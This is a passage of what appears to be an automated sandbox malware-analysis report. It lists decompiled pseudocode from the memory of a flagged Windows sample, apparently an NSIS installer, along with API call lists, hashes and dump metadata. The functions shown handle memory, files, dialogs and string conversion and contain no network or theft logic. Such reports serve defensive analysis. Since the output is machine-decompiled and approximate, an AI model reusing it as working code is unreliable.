                                                                                                                        						if(_t54 != _t49) {
                                                                                                                        							E004034E5(_t49);
                                                                                                                        							E004034CF(_t54,  *(_t61 - 0x44));
                                                                                                                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                                                                        							 *(_t61 - 0x10) = _t59;
                                                                                                                        							if(_t59 != _t49) {
                                                                                                                        								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                                                                        								while( *_t59 != _t49) {
                                                                                                                        									_t60 = _t59 + 8;
                                                                                                                        									 *(_t61 - 0x3c) =  *_t59;
                                                                                                                        									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                                                        									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                                                                        								}
                                                                                                                        								GlobalFree( *(_t61 - 0x10));
                                                                                                                        							}
                                                                                                                        							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                                                                        							GlobalFree(_t54);
                                                                                                                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                                                                        					CloseHandle( *(_t61 + 8));
                                                                                                                        				}
                                                                                                                        				_t56 = 0xfffffff3;
                                                                                                                        				if(_t52 < _t49) {
                                                                                                                        					_t56 = 0xffffffef;
                                                                                                                        					DeleteFileW( *(_t61 - 0x40));
                                                                                                                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				_push(_t56);
                                                                                                                        				E00401423();
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2667972263-0
                                                                                                                        • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                        • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                        • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                        • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E70B22480(void* __edx) {
                                                                                                                        				void* _t37;
                                                                                                                        				signed int _t38;
                                                                                                                        				void* _t39;
                                                                                                                        				void* _t41;
                                                                                                                        				signed char* _t42;
                                                                                                                        				signed char* _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t54;
                                                                                                                        
                                                                                                                        				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                                        				while(1) {
                                                                                                                        					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                                        					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                                        					_t52 = _t51[0x18];
                                                                                                                        					if(_t52 == 0) {
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					_t41 = 0x1a;
                                                                                                                        					if(_t52 == _t41) {
                                                                                                                        						goto L9;
                                                                                                                        					}
                                                                                                                        					if(_t52 != 0xffffffff) {
                                                                                                                        						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                                        							_t51[0x18] = _t41;
                                                                                                                        							goto L12;
                                                                                                                        						} else {
                                                                                                                        							_t37 = E70B2135A(_t52 - 1);
                                                                                                                        							L10:
                                                                                                                        							goto L11;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t37 = E70B212E3();
                                                                                                                        						L11:
                                                                                                                        						_t52 = _t37;
                                                                                                                        						L12:
                                                                                                                        						_t13 =  &(_t51[8]); // 0x1020
                                                                                                                        						_t42 = _t13;
                                                                                                                        						if(_t51[4] >= 0) {
                                                                                                                        						}
                                                                                                                        						_t38 =  *_t51 & 0x000000ff;
                                                                                                                        						_t51[0x1c] = 0;
                                                                                                                        						if(_t38 > 7) {
                                                                                                                        							L27:
                                                                                                                        							_t39 = GlobalFree(_t52);
                                                                                                                        							if( *(_t54 + 0x10) == 0) {
                                                                                                                        								return _t39;
                                                                                                                        							}
                                                                                                                        							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                                        							} else {
                                                                                                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                                        							}
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							switch( *((intOrPtr*)(_t38 * 4 +  &M70B225F8))) {
                                                                                                                        								case 0:
                                                                                                                        									 *_t42 = 0;
                                                                                                                        									goto L27;
                                                                                                                        								case 1:
                                                                                                                        									__eax = E70B213B1(__ebp);
                                                                                                                        									goto L21;
                                                                                                                        								case 2:
                                                                                                                        									 *__edi = E70B213B1(__ebp);
                                                                                                                        									__edi[1] = __edx;
                                                                                                                        									goto L27;
                                                                                                                        								case 3:
                                                                                                                        									__eax = GlobalAlloc(0x40,  *0x70b2506c);
                                                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                                                        									__edx = 0;
                                                                                                                        									 *__edi = __eax;
                                                                                                                        									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x70b2506c, __eax,  *0x70b2506c, 0, 0);
                                                                                                                        									goto L27;
                                                                                                                        								case 4:
                                                                                                                        									__eax = E70B212CC(__ebp);
                                                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                                                        									L21:
                                                                                                                        									 *__edi = __eax;
                                                                                                                        									goto L27;
                                                                                                                        								case 5:
                                                                                                                        									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                        									_push(__eax);
                                                                                                                        									 *(__esi + 0x1c) = __eax;
                                                                                                                        									_push(__ebp);
                                                                                                                        									 *__edi = __eax;
                                                                                                                        									__imp__CLSIDFromString();
                                                                                                                        									goto L27;
                                                                                                                        								case 6:
                                                                                                                        									if( *__ebp != __cx) {
                                                                                                                        										__eax = E70B213B1(__ebp);
                                                                                                                        										 *__ebx = __eax;
                                                                                                                        									}
                                                                                                                        									goto L27;
                                                                                                                        								case 7:
                                                                                                                        									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                                        									( *(__esi + 0x18) - 1) *  *0x70b2506c =  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18;
                                                                                                                        									 *__ebx =  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18;
                                                                                                                        									asm("cdq");
                                                                                                                        									__eax = E70B21510(__edx,  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18, __edx,  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2);
                                                                                                                        									goto L27;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L9:
                                                                                                                        					_t37 = E70B212CC(0x70b25044);
                                                                                                                        					goto L10;
                                                                                                                        				}
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B225C2
                                                                                                                          • Part of subcall function 70B212CC: lstrcpynW.KERNEL32(00000000,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212DC
                                                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 70B22548
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70B22563
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4216380887-0
                                                                                                                        • Opcode ID: f945e039c97906ee975ffd9a2190b4d60c441a67f280f84989b4ca5610a954c1
                                                                                                                        • Instruction ID: 64e3dc2e31b39e61efba2ed8da5abc438f514bac7ad430031eccfae026b178f1
                                                                                                                        • Opcode Fuzzy Hash: f945e039c97906ee975ffd9a2190b4d60c441a67f280f84989b4ca5610a954c1
                                                                                                                        • Instruction Fuzzy Hash: 344190B1004205EFE725EF25EC80A1E77F8FBA4312B20891DF95AC7651EB70A745DB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00401D81(void* __ebx, void* __edx) {
                                                                                                                        				struct HWND__* _t30;
                                                                                                                        				WCHAR* _t38;
                                                                                                                        				void* _t48;
                                                                                                                        				void* _t53;
                                                                                                                        				signed int _t55;
                                                                                                                        				signed int _t60;
                                                                                                                        				long _t63;
                                                                                                                        				void* _t65;
                                                                                                                        
                                                                                                                        				_t53 = __ebx;
                                                                                                                        				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                                                        				} else {
                                                                                                                        					E00402D84(2);
                                                                                                                        					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                                                        				}
                                                                                                                        				_t55 =  *(_t65 - 0x24);
                                                                                                                        				 *(_t65 + 8) = _t30;
                                                                                                                        				_t60 = _t55 & 0x00000004;
                                                                                                                        				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                                                        				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                                                        				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                        				if((_t55 & 0x00010000) == 0) {
                                                                                                                        					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                                                        				} else {
                                                                                                                        					_t38 = E00402DA6(0x11);
                                                                                                                        				}
                                                                                                                        				 *(_t65 - 0x44) = _t38;
                                                                                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                                                        				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                                                        				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                                                        					DeleteObject(_t48);
                                                                                                                        				}
                                                                                                                        				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                                                        					_push(_t63);
                                                                                                                        					E00406484();
                                                                                                                        				}
                                                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                        • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                        • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                        • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E70B216BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                                        				void* _t10;
                                                                                                                        				int _t14;
                                                                                                                        
                                                                                                                        				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                        				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                        				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                        				GlobalFree(_t10);
                                                                                                                        				return _t7;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216D5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216DC
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216F0
                                                                                                                        • GetProcAddress.KERNEL32(70B222D8,00000000), ref: 70B216F7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B21700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1148316912-0
                                                                                                                        • Opcode ID: 078bc33b9f749b0621b7a86fafb01cd95c8c3ea4aaa766e70d234a4a159a8ec2
                                                                                                                        • Instruction ID: 60f06a0cd4f58890017107dde8e6526f8d26bb67821a0ee75fc5372a6fd1a779
                                                                                                                        • Opcode Fuzzy Hash: 078bc33b9f749b0621b7a86fafb01cd95c8c3ea4aaa766e70d234a4a159a8ec2
                                                                                                                        • Instruction Fuzzy Hash: 08F01C732061387BD63117A78C4CD9BBE9CDF8B2F5B210211F728921A18AA14D42D7F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                        				char _v68;
                                                                                                                        				char _v132;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t23;
                                                                                                                        				signed int _t24;
                                                                                                                        				void* _t31;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t44;
                                                                                                                        				signed int _t46;
                                                                                                                        				signed int _t50;
                                                                                                                        				signed int _t52;
                                                                                                                        				signed int _t53;
                                                                                                                        				signed int _t55;
                                                                                                                        
                                                                                                                        				_t23 = _a16;
                                                                                                                        				_t53 = _a12;
                                                                                                                        				_t44 = 0xffffffdc;
                                                                                                                        				if(_t23 == 0) {
                                                                                                                        					_push(0x14);
                                                                                                                        					_pop(0);
                                                                                                                        					_t24 = _t53;
                                                                                                                        					if(_t53 < 0x100000) {
                                                                                                                        						_push(0xa);
                                                                                                                        						_pop(0);
                                                                                                                        						_t44 = 0xffffffdd;
                                                                                                                        					}
                                                                                                                        					if(_t53 < 0x400) {
                                                                                                                        						_t44 = 0xffffffde;
                                                                                                                        					}
                                                                                                                        					if(_t53 < 0xffff3333) {
                                                                                                                        						_t52 = 0x14;
                                                                                                                        						asm("cdq");
                                                                                                                        						_t24 = 1 / _t52 + _t53;
                                                                                                                        					}
                                                                                                                        					_t25 = _t24 & 0x00ffffff;
                                                                                                                        					_t55 = _t24 >> 0;
                                                                                                                        					_t46 = 0xa;
                                                                                                                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                        				} else {
                                                                                                                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                        					_t50 = 0;
                                                                                                                        				}
                                                                                                                        				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                        				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                        				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                                                        				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                        				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                                                        • wsprintfW.USER32 ref: 00404DF0
                                                                                                                        • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: 8eaa60c285ed2ca3ba3cc070ccd72c3506245c9ef86633ed67cf81484c09c26b
                                                                                                                        • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                        • Opcode Fuzzy Hash: 8eaa60c285ed2ca3ba3cc070ccd72c3506245c9ef86633ed67cf81484c09c26b
                                                                                                                        • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 58%
                                                                                                                        			E00405E0C(WCHAR* _a4) {
                                                                                                                        				WCHAR* _t9;
                                                                                                                        
                                                                                                                        				_t9 = _a4;
                                                                                                                        				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                        				_push(_t9);
                                                                                                                        				if( *(CharPrevW()) != 0x5c) {
                                                                                                                        					lstrcatW(_t9, 0x40a014);
                                                                                                                        				}
                                                                                                                        				return _t9;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-3355392842
                                                                                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                        • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                        • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E70B210E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                                                        				void* _v0;
                                                                                                                        				void* _t27;
                                                                                                                        				signed int _t29;
                                                                                                                        				void* _t30;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t38;
                                                                                                                        				void* _t40;
                                                                                                                        				void* _t48;
                                                                                                                        				void* _t54;
                                                                                                                        				void* _t63;
                                                                                                                        				void* _t64;
                                                                                                                        				signed int _t66;
                                                                                                                        				void* _t67;
                                                                                                                        				void* _t73;
                                                                                                                        				void* _t74;
                                                                                                                        				void* _t77;
                                                                                                                        				void* _t80;
                                                                                                                        				void _t81;
                                                                                                                        				void _t82;
                                                                                                                        				intOrPtr _t84;
                                                                                                                        				void* _t86;
                                                                                                                        				void* _t88;
                                                                                                                        
                                                                                                                        				 *0x70b2506c = _a8;
                                                                                                                        				 *0x70b25070 = _a16;
                                                                                                                        				 *0x70b25074 = _a12;
                                                                                                                        				_a12( *0x70b25048, E70B21651, _t73);
                                                                                                                        				_t66 =  *0x70b2506c +  *0x70b2506c * 4 << 3;
                                                                                                                        				_t27 = E70B212E3();
                                                                                                                        				_v0 = _t27;
                                                                                                                        				_t74 = _t27;
                                                                                                                        				if( *_t27 == 0) {
                                                                                                                        					L28:
                                                                                                                        					return GlobalFree(_t27);
                                                                                                                        				}
                                                                                                                        				do {
                                                                                                                        					_t29 =  *_t74 & 0x0000ffff;
                                                                                                                        					_t67 = 2;
                                                                                                                        					_t74 = _t74 + _t67;
                                                                                                                        					_t88 = _t29 - 0x66;
                                                                                                                        					if(_t88 > 0) {
                                                                                                                        						_t30 = _t29 - 0x6c;
                                                                                                                        						if(_t30 == 0) {
                                                                                                                        							L23:
                                                                                                                        							_t31 =  *0x70b25040;
                                                                                                                        							if( *0x70b25040 == 0) {
                                                                                                                        								goto L26;
                                                                                                                        							}
                                                                                                                        							E70B21603( *0x70b25074, _t31 + 4, _t66);
                                                                                                                        							_t34 =  *0x70b25040;
                                                                                                                        							_t86 = _t86 + 0xc;
                                                                                                                        							 *0x70b25040 =  *_t34;
                                                                                                                        							L25:
                                                                                                                        							GlobalFree(_t34);
                                                                                                                        							goto L26;
                                                                                                                        						}
                                                                                                                        						_t36 = _t30 - 4;
                                                                                                                        						if(_t36 == 0) {
                                                                                                                        							L13:
                                                                                                                        							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                        							_t74 = _t74 + _t67;
                                                                                                                        							_t34 = E70B21312(E70B2135A(_t38));
                                                                                                                        							L14:
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						_t40 = _t36 - _t67;
                                                                                                                        						if(_t40 == 0) {
                                                                                                                        							L11:
                                                                                                                        							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                        							_t74 = _t74 + _t67;
                                                                                                                        							_t34 = E70B21381(_t80, E70B212E3());
                                                                                                                        							goto L14;
                                                                                                                        						}
                                                                                                                        						L8:
                                                                                                                        						if(_t40 == 1) {
                                                                                                                        							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                                                        							_t10 = _t81 + 4; // 0x4
                                                                                                                        							E70B21603(_t10,  *0x70b25074, _t66);
                                                                                                                        							_t86 = _t86 + 0xc;
                                                                                                                        							 *_t81 =  *0x70b25040;
                                                                                                                        							 *0x70b25040 = _t81;
                                                                                                                        						}
                                                                                                                        						goto L26;
